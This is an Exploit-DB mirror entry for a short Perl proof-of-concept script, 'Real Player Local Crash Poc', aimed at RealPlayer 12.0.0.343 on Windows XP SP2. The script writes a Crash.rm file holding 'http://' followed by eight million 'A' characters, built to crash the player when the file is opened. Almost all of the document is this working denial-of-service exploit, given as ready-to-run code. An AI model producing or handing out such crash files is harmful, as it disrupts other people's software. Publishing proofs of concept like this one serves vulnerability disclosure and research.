exploit-db-mirror/exploits/windows/dos/11084.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
344 B
Perl
Executable file

#!/user/bin/perl
# Exploit Title: [Real Player Local Crash Poc]
# Date: [2010/01/09]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.real.com]
# Version: [12.0.0.343]
# Tested on: [windows XP sp2]
# Code :
$boom="http://"."A" x 8000000;
open(myfile,'>>Crash.rm') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";